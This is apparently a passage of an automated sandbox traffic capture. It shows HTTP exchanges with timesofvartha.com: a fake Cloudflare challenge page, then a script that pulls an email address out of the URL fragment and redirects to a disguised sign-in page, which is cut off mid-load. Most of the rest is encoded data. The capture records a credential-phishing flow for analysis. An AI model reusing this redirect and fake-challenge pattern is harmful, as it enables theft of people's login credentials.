US23j6kTk$LuZE7oCWkZZ1zmZoZvZiiQ1oNaTZLTSBCBiZVSzKZIXKZ50H0aiS3SfxKkZ$ZZyQkXiSZFfXZsZLSLTSKdkoZBZMStCLLZ$S5OjwZmFLkQXZ0SLIsIZbZZ-Z6Z8ScZf7eQgB7Q-gyZf$fqCbSfIL-Zjw6-LbZD6BnUyZ+SZaQiZ00SeLTS8S1rasgQoS-f-ZuCBkf1ShZnZcsSFZkS2kZWZMSZcZiZZFZxZsZcNSvEcSogf6ZxSLK
2024-11-18 16:55:59 UTC	1649	OUT	Data Raw: 50 34 6e 62 5a 5a 66 34 46 5a 38 43 42 2d 66 50 71 6e 62 65 4a 59 49 5a 38 53 56 45 63 6f 77 72 45 2d 34 4c 77 38 44 42 76 6f 66 74 5a 4d 5a 4d 6f 6b 4a 5a 37 64 41 74 4f 68 56 66 75 4a 67 5a 76 76 45 6e 56 77 66 32 5a 66 53 69 47 39 31 24 64 2d 67 39 66 31 4b 54 64 57 33 66 64 73 38 53 4d 50 66 49 78 57 4c 75 35 50 50 2d 78 79 36 2d 51 31 6f 66 58 6e 6e 36 24 67 78 5a 6b 50 63 4a 75 69 6d 62 36 50 4d 41 4e 43 63 72 45 63 48 51 43 36 7a 7a 43 43 32 53 56 78 5a 46 64 31 6b 74 6b 4e 43 4d 43 49 62 4f 39 6d 48 72 77 69 57 63 37 38 62 6d 6b 6f 66 59 5a 4b 64 63 47 36 55 43 73 67 36 61 4c 6f 77 41 2d 67 62 72 48 50 6f 58 2d 67 51 37 41 56 67 51 67 51 4d 73 2b 56 4b 44 51 66 37 44 61 45 4d 59 48 44 36 67 74 6b 5a 58 71 46 4c 69 4b 38 54 65 69 53 6b 4b 76 79 41 Data Ascii: P4nbZZf4FZ8CB-fPqnbeJYIZ8SVEcowrE-4Lw8DBvoftZMZMokJZ7dAtOhVfuJgZvvEnVwf2ZfSiG91$d-g9f1KTdW3fds8SMPfIxWLu5PP-xy6-Q1ofXnn6$gxZkPcJuimb6PMANCcrEcHQC6zzCC2SVxZFd1ktkNCMCIbO9mHrwiWc78bmkofYZKdcG6UCsg6aLowA-gbrHPoX-gQ7AVgQgQMs+VKDQf7DaEMYHD6gtkZXqFLiK8TeiSkKvyA
2024-11-18 16:56:00 UTC	1300	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 16:56:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 6032 Connection: close cf-chl-out-s: TnNkOoIpFORelZ6j0Rc/52PucnKTkCF4kYWWhXkJ0ga4j6p/yPxfX1CX+UpL595txvEXlX7Rqm3WSttmPMgk5cA0WgOuoYnJqwPEKazQYSaa8yqDdGB8za1fHm9DAIdaJrMaWpz/gtZW2tum3EynaqiX6v9pLkbSrXcEhUZaF4igLnCP2YDhHEISAd2IWCpQCmKuKCLfNlhQPamu8/cwORO2GD6TaCuBarnONRZd7gugEMlLygEWa1Qab5mfOofjfbwy7ssHZ/6QygyEYqnjaX4ETkUgSDOcTxEFNb8nkSc5JSi1pxlDiR9iziez/arFVAcvIMPTwYPWvPC1vc/E/XePFTp7/x+9Fd1jDLLAD6EdUz3B1/osjm0kPyvMnS74uxiGTRszz5XNaky0u8VjPv9rMbHk78jwAD9ir+vGSSe4GoxLX+lEquLEB6A/Qd6CM2sKLHJc0C1X/NYyZRt061bD4vMq/kHFsPGVUjrb1irXsc2jFz4Ob0xHwL49qriiTIoLsyEbqyxWORQnETXZ0hj0/fsx6BaLAtTTZEsbkF1ixDGlfvPKEZW9PZMlPYlX4KxJkrdNR8O57yfpI6fetXT1ZIhNZgLZVuTVjB+02waEbTLlklOX8GHx9dRY4OqBuGha08Ewm3z0OCfXpWwLkks9c+MryIdP0derQ6uvj9/siRB7tbw/R4npgsGEGo3IpJf3+5YLwa4HAOhNRrYZOQ6CvB5ZdvaldJdaSS3CAHJNeq2iRUkg/YIgReSVeh4Amxh/5ndw+SrWYWoD/Hd3FJPolXsbyfLVPHI6gnj4P/pseLHhHjMMzxnZm/K1F+hFwzibKDY1E0QTLaB5o8W2TwQ/zMk9e9mYhwZ61yGwB0rfu9DKlRuUmtyyZlYF+l04+snkZaRTqmchB7h5EwAeShCt9CM+BtmBdN8yJvdDMBI+rKWQEJOzMe8z8BA/qK8oVhIdzGjheoLQEujd/VfL21ru3Nx6Bi1fgVMnFjbbpmXjy2owzK [TRUNCATED]
2024-11-18 16:56:00 UTC	233	IN	Data Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 54 61 39 64 47 77 67 7a 68 54 4a 71 79 48 2b 44 36 33 58 50 48 4e 68 51 67 4f 77 79 46 6d 4d 38 2f 55 62 34 71 41 75 58 6d 44 70 55 6d 37 69 7a 4d 6e 59 43 41 76 33 58 42 64 75 63 47 4c 6b 50 78 6d 7a 79 4f 39 49 31 55 6b 69 51 77 41 41 32 73 43 68 36 6a 74 4c 32 70 52 48 58 4a 54 4e 59 69 49 70 4f 30 62 6f 57 61 56 6b 44 63 4d 36 79 62 39 55 71 2f 51 3d 3d 24 46 30 6d 30 72 63 78 6b 67 62 2f 47 6e 6e 7a 42 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 65 34 39 37 64 63 36 61 64 66 65 33 61 63 37 2d 44 46 57 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a Data Ascii: cf-chl-out: Ta9dGwgzhTJqyH+D63XPHNhQgOwyFmM8/Ub4qAuXmDpUm7izMnYCAv3XBducGLkPxmzyO9I1UkiQwAA2sCh6jtL2pRHXJTNYiIpO0boWaVkDcM6yb9Uq/Q==$F0m0rcxkgb/GnnzBServer: cloudflareCF-RAY: 8e497dc6adfe3ac7-DFWalt-svc: h3=":443"; ma=86400
2024-11-18 16:56:00 UTC	1205	IN	Data Raw: 71 58 69 4d 77 5a 61 66 6c 72 47 57 79 4a 61 7a 6e 4d 50 49 6d 62 71 6e 78 38 61 4d 71 38 4f 76 6b 59 75 70 72 71 53 58 71 64 61 67 33 71 44 6b 72 4a 76 65 32 65 6a 6e 77 2b 6d 6f 74 65 66 4e 70 2b 2f 72 30 61 37 67 36 4d 6d 78 39 64 6e 71 2f 50 76 62 2f 62 79 7a 31 65 32 37 38 4e 6e 66 77 2f 59 4d 35 41 30 4d 37 77 37 4e 44 75 48 37 7a 68 48 68 41 52 6b 59 43 68 72 5a 43 67 67 49 32 2f 63 51 41 74 76 35 49 66 67 54 41 41 6f 67 34 77 54 36 2b 4f 6f 48 4a 41 7a 74 4d 67 49 6e 4f 54 67 79 4f 76 67 55 48 69 6a 38 50 68 4c 2b 2b 78 77 77 50 41 45 66 48 69 52 4e 54 45 70 4f 44 6a 30 4e 46 41 77 57 44 54 52 50 4f 45 68 45 4b 52 30 2b 4d 6b 30 62 52 46 56 44 58 44 78 6d 49 7a 6f 6a 4f 32 6c 75 54 44 78 77 4b 6d 74 50 54 6c 42 7a 54 7a 68 49 62 6a 78 72 54 58 35 Data Ascii: qXiMwZaflrGWyJaznMPImbqnx8aMq8OvkYuprqSXqdag3qDkrJve2ejnw+motefNp+/r0a7g6Mmx9dnq/Pvb/byz1e278Nnfw/YM5A0M7w7NDuH7zhHhARkYChrZCggI2/cQAtv5IfgTAAog4wT6+OoHJAztMgInOTgyOvgUHij8PhL++xwwPAEfHiRNTEpODj0NFAwWDTRPOEhEKR0+Mk0bRFVDXDxmIzojO2luTDxwKmtPTlBzTzhIbjxrTX5
2024-11-18 16:56:00 UTC	1369	IN	Data Raw: 67 77 37 46 68 67 59 50 67 6b 67 54 55 45 70 4d 52 41 75 45 46 73 6c 48 52 55 6f 49 46 6c 42 59 69 77 33 50 57 49 78 4b 54 6c 55 4a 45 4a 45 5a 43 38 75 50 58 49 38 63 56 39 34 62 6b 46 4e 65 55 64 6f 54 54 74 33 56 6e 4a 31 4f 6f 42 37 51 30 53 46 58 48 35 47 59 32 46 34 68 33 39 68 66 30 35 72 64 59 52 6a 68 4a 71 50 5a 4a 56 78 66 35 64 32 65 59 31 67 6b 70 78 32 61 4b 57 54 69 58 57 44 67 5a 6c 72 65 5a 2b 7a 5a 72 43 66 64 34 43 50 63 36 6c 7a 62 33 32 4d 74 70 4f 72 72 33 32 77 67 4d 47 45 6d 37 4e 39 68 4d 75 32 72 34 6d 4f 72 59 57 66 71 38 43 6b 7a 4b 36 71 70 35 71 50 79 39 71 66 6f 61 44 51 6f 73 32 31 31 4e 7a 41 74 65 6d 6d 74 65 2b 73 36 63 6e 52 34 72 2f 64 73 4f 65 77 39 39 6e 62 76 4c 4f 39 79 37 72 39 30 66 33 36 41 39 57 2b 30 67 58 49 Data Ascii: gw7FhgYPgkgTUEpMRAuEFslHRUoIFlBYiw3PWIxKTlUJEJEZC8uPXI8cV94bkFNeUdoTTt3VnJ1OoB7Q0SFXH5GY2F4h39hf05rdYRjhJqPZJVxf5d2eY1gkpx2aKWTiXWDgZlreZ+zZrCfd4CPc6lzb32MtpOrr32wgMGEm7N9hMu2r4mOrYWfq8CkzK6qp5qPy9qfoaDQos211NzAtemmte+s6cnR4r/dsOew99nbvLO9y7r90f36A9W+0gXI
2024-11-18 16:56:00 UTC	1369	IN	Data Raw: 4e 53 4d 6b 68 42 4e 7a 59 53 4a 7a 4d 34 55 45 30 38 51 56 51 75 52 45 45 64 5a 55 52 47 4e 6c 6c 45 53 6d 42 44 53 45 38 78 59 6b 46 56 4a 32 4e 66 52 44 68 59 53 6c 31 37 65 55 68 53 4f 31 57 42 5a 47 4a 6e 63 6d 5a 6f 59 33 35 72 58 56 39 35 62 47 35 6a 61 33 52 30 6c 58 42 55 57 5a 46 55 6c 31 4e 63 67 4a 43 56 67 33 57 56 66 48 4f 67 68 49 64 37 68 49 71 68 64 34 47 61 6e 6e 2b 6e 6b 57 32 78 6d 4a 6d 47 71 5a 53 63 69 6f 75 73 65 5a 47 58 71 35 37 44 66 73 57 61 78 62 36 2b 77 49 71 64 71 63 6d 6a 72 71 65 4f 30 4a 53 32 6f 4a 62 48 74 4a 65 76 79 35 6d 61 6c 2b 43 79 6e 65 50 41 32 74 2b 6d 75 61 6e 69 78 4b 6e 47 71 63 6a 6a 34 36 2f 4d 36 37 65 30 35 4d 58 62 75 2b 6e 55 33 2f 6e 5a 77 63 32 36 77 74 55 48 30 41 4c 30 31 73 51 47 32 63 37 48 2b Data Ascii: NSMkhBNzYSJzM4UE08QVQuREEdZURGNllESmBDSE8xYkFVJ2NfRDhYSl17eUhSO1WBZGJncmZoY35rXV95bG5ja3R0lXBUWZFUl1NcgJCVg3WVfHOghId7hIqhd4Gann+nkW2xmJmGqZSciouseZGXq57DfsWaxb6+wIqdqcmjrqeO0JS2oJbHtJevy5mal+CynePA2t+muanixKnGqcjj46/M67e05MXbu+nU3/nZwc26wtUH0AL01sQG2c7H+
2024-11-18 16:56:00 UTC	1369	IN	Data Raw: 5a 52 30 67 53 4a 52 52 61 56 69 46 58 48 43 51 6c 50 56 68 65 50 68 78 6c 4a 69 6f 39 55 43 4a 47 57 30 39 6f 54 47 38 75 4e 6b 39 4a 4e 44 4a 54 55 47 39 4a 56 6b 31 31 51 46 77 38 68 55 69 45 66 6f 61 43 65 57 47 45 55 46 47 48 55 34 70 53 64 49 6d 4f 6c 33 46 36 6b 47 57 58 58 56 35 7a 63 4a 4e 65 56 33 32 6d 58 35 57 4a 6e 71 4f 46 6c 35 42 6d 65 62 4f 62 66 34 61 7a 6b 58 61 51 6a 4b 79 46 75 6f 36 4f 64 71 79 41 67 48 32 77 6f 4d 4a 36 6f 62 53 5a 77 38 57 5a 68 5a 69 70 6e 61 33 49 6c 62 44 48 7a 70 61 30 7a 4e 4b 79 72 62 66 57 6e 73 72 58 32 39 32 38 31 64 37 55 78 4e 2f 6c 32 4d 54 70 35 75 79 38 35 4b 75 79 33 75 65 77 7a 73 6a 71 38 75 58 6d 37 72 6a 57 33 64 36 38 78 64 48 6c 2f 76 54 32 41 51 54 66 36 50 37 48 2b 66 41 49 43 77 37 31 38 4d Data Ascii: ZR0gSJRRaViFXHCQlPVhePhxlJio9UCJGW09oTG8uNk9JNDJTUG9JVk11QFw8hUiEfoaCeWGEUFGHU4pSdImOl3F6kGWXXV5zcJNeV32mX5WJnqOFl5BmebObf4azkXaQjKyFuo6OdqyAgH2woMJ6obSZw8WZhZipna3IlbDHzpa0zNKyrbfWnsrX29281d7UxN/l2MTp5uy85Kuy3uewzsjq8uXm7rjW3d68xdHl/vT2AQTf6P7H+fAICw718M
2024-11-18 16:56:00 UTC	720	IN	Data Raw: 4d 55 45 76 55 55 4a 45 5a 53 42 54 58 7a 4e 63 53 45 30 33 62 6b 4e 51 62 55 35 45 54 30 39 6d 57 55 4e 58 57 56 31 4c 4f 30 78 74 64 6b 4a 30 63 6a 39 78 65 6e 4a 2f 59 33 56 71 52 6e 6d 4c 66 45 74 4f 62 58 4e 30 59 32 39 70 64 33 65 44 66 46 64 72 66 34 43 56 6f 5a 32 54 6d 6e 65 51 6c 47 46 6d 6c 58 71 4b 6a 34 6d 68 69 34 71 6f 6b 48 2b 4d 67 4b 57 70 70 70 43 72 73 62 36 4f 6e 37 61 54 74 36 2b 34 66 72 69 6b 76 4d 57 37 71 61 75 35 67 63 48 42 73 39 4b 7a 79 62 4f 55 77 61 6a 46 78 4c 6e 4e 76 38 76 4b 76 74 44 58 78 64 71 36 34 72 6e 49 35 63 7a 4a 70 73 2f 76 32 73 76 65 77 4e 54 54 33 73 7a 6c 73 65 62 4a 33 4c 66 35 36 65 44 66 41 76 44 58 31 4e 66 44 39 77 44 6e 44 4f 7a 71 41 67 51 43 37 2b 50 39 38 76 4c 57 39 76 66 7a 38 39 62 36 36 39 62 Data Ascii: MUEvUUJEZSBTXzNcSE03bkNQbU5ET09mWUNXWV1LO0xtdkJ0cj9xenJ/Y3VqRnmLfEtObXN0Y29pd3eDfFdrf4CVoZ2TmneQlGFmlXqKj4mhi4qokH+MgKWpppCrsb6On7aTt6+4frikvMW7qau5gcHBs9KzybOUwajFxLnNv8vKvtDXxdq64rnI5czJps/v2svewNTT3szlsebJ3Lf56eDfAvDX1NfD9wDnDOzqAgQC7+P98vLW9vfz89b669b

Timestamp	Bytes transferred	Direction	Data
2024-11-18 16:56:00 UTC	675	OUT	POST /cdn-cgi/challenge-platform/h/b/rc/8e497d813cb62ff4 HTTP/1.1 Host: timesofvartha.com Connection: keep-alive Content-Length: 916 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/json Accept: / Origin: https://timesofvartha.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://timesofvartha.com/cloudflare-challenge/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-18 16:56:00 UTC	916	OUT	Data Raw: 7b 22 73 69 74 65 6b 65 79 22 3a 22 30 78 34 41 41 41 41 41 41 41 68 6b 66 4b 31 6e 7a 38 6a 6a 47 2d 77 45 22 2c 22 73 65 63 6f 6e 64 61 72 79 54 6f 6b 65 6e 22 3a 22 30 2e 31 56 75 71 48 59 36 70 47 50 58 51 32 6a 47 5f 67 78 75 6c 66 75 63 2d 52 51 6d 6e 39 78 34 52 6a 30 4d 54 6a 6b 61 4f 42 66 59 44 79 31 73 59 32 6e 45 6a 6e 7a 57 57 50 5a 39 2d 39 51 56 75 72 74 38 4e 64 77 73 48 42 63 30 65 45 55 56 52 57 58 63 2d 66 30 70 4d 75 52 72 78 46 33 4c 31 49 67 76 33 6f 73 2d 70 59 68 64 37 55 6a 53 76 54 4f 30 7a 45 43 6b 4b 39 6d 5f 47 35 2d 6f 65 42 55 30 52 33 4b 4c 6e 58 30 6b 30 55 6a 6e 4e 50 45 38 35 4a 4f 76 53 30 57 46 6c 30 67 5f 51 6c 6a 48 70 4c 73 77 72 35 47 42 57 77 4e 47 77 77 36 38 74 6e 70 63 62 74 51 4f 55 73 50 76 66 38 2d 59 45 69 Data Ascii: {"sitekey":"0x4AAAAAAAhkfK1nz8jjG-wE","secondaryToken":"0.1VuqHY6pGPXQ2jG_gxulfuc-RQmn9x4Rj0MTjkaOBfYDy1sY2nEjnzWWPZ9-9QVurt8NdwsHBc0eEUVRWXc-f0pMuRrxF3L1Igv3os-pYhd7UjSvTO0zECkK9m_G5-oeBU0R3KLnX0k0UjnNPE85JOvS0WFl0g_QljHpLswr5GBWwNGww68tnpcbtQOUsPvf8-YEi
2024-11-18 16:56:01 UTC	261	IN	HTTP/1.1 404 Not Found Date: Mon, 18 Nov 2024 16:56:00 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 15 Mar 2022 22:06:31 GMT Accept-Ranges: bytes Content-Length: 583 Vary: Accept-Encoding Content-Type: text/html
2024-11-18 16:56:01 UTC	583	IN	Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {

Timestamp	Bytes transferred	Direction	Data
2024-11-18 16:56:01 UTC	878	OUT	POST /cloudflare-challenge/ HTTP/1.1 Host: timesofvartha.com Connection: keep-alive Content-Length: 859 Cache-Control: max-age=0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://timesofvartha.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://timesofvartha.com/cloudflare-challenge/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-18 16:56:01 UTC	859	OUT	Data Raw: 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 3d 30 2e 34 67 39 30 59 6b 6b 62 56 32 64 75 32 42 6a 49 52 6e 51 30 32 34 4e 35 4b 5a 6d 4d 77 75 4c 48 70 65 6d 44 76 2d 38 5a 57 4a 34 44 57 32 56 63 35 49 64 37 45 54 45 4f 72 54 45 6f 39 70 35 6d 50 73 79 4a 78 4d 4c 47 55 32 6a 56 64 72 41 69 32 30 6d 35 66 6b 65 53 59 47 74 6f 31 6c 5f 78 63 58 4f 46 75 54 30 50 6a 58 6c 6d 75 58 64 33 4e 4e 79 76 48 41 50 74 6f 59 50 64 4f 6d 58 5f 72 36 45 52 59 4c 6e 45 4f 71 64 5a 35 71 4a 42 48 65 64 77 6e 36 4e 66 35 4f 76 6b 52 4b 32 63 54 69 30 54 2d 6f 61 6e 48 30 76 64 2d 6e 75 41 53 61 63 61 74 78 4a 43 72 53 61 37 79 6e 34 64 34 52 74 6a 46 48 36 64 6d 33 38 45 47 71 46 4b 63 61 77 76 42 39 30 37 49 36 57 75 72 46 6d 48 52 66 6a 2d 55 7a 6b Data Ascii: cf-turnstile-response=0.4g90YkkbV2du2BjIRnQ024N5KZmMwuLHpemDv-8ZWJ4DW2Vc5Id7ETEOrTEo9p5mPsyJxMLGU2jVdrAi20m5fkeSYGto1l_xcXOFuT0PjXlmuXd3NNyvHAPtoYPdOmX_r6ERYLnEOqdZ5qJBHedwn6Nf5OvkRK2cTi0T-oanH0vd-nuASacatxJCrSa7yn4d4RtjFH6dm38EGqFKcawvB907I6WurFmHRfj-Uzk
2024-11-18 16:56:03 UTC	208	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 16:56:01 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-11-18 16:56:03 UTC	243	IN	Data Raw: 65 38 0d 0a 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 76 61 72 20 66 72 61 67 6d 65 6e 74 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 75 62 73 74 72 69 6e 67 28 31 29 3b 0a 20 20 20 20 66 72 61 67 6d 65 6e 74 20 3d 20 66 72 61 67 6d 65 6e 74 2e 72 65 70 6c 61 63 65 28 2f 5c 2b 2f 67 2c 20 27 40 27 29 3b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 27 68 74 74 70 73 3a 2f 2f 74 69 6d 65 73 6f 66 76 61 72 74 68 61 2e 63 6f 6d 2f 61 75 74 68 2d 73 69 67 6e 69 6e 2d 61 70 69 62 72 69 64 67 65 5f 34 38 31 37 33 36 75 79 67 37 79 37 33 68 64 75 69 32 31 2f 23 27 20 2b 20 66 72 61 67 6d 65 6e 74 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: e8<script> var fragment = window.location.hash.substring(1); fragment = fragment.replace(/\+/g, '@'); window.location.href = 'https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/#' + fragment; </script>0

Timestamp	Bytes transferred	Direction	Data
2024-11-18 16:56:03 UTC	747	OUT	GET /auth-signin-apibridge_481736uyg7y73hdui21/ HTTP/1.1 Host: timesofvartha.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://timesofvartha.com/cloudflare-challenge/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-18 16:56:03 UTC	255	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 16:56:03 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 14 Nov 2024 13:43:20 GMT Accept-Ranges: bytes Content-Length: 3546 Vary: Accept-Encoding Content-Type: text/html
2024-11-18 16:56:03 UTC	3546	IN	Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 0a 23 6e 61 63 72 65 6f 75 73 20 7b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 62 6f 75 6e 63 65 20 35 73 20 69 6e 66 69 6e 69 74 65 3b 20 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 62 6f 75 6e 63 65 20 7b 35 39 25 20 Data Ascii: <html><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script><style>#nacreous { animation: bounce 5s infinite; }@keyframes bounce {59%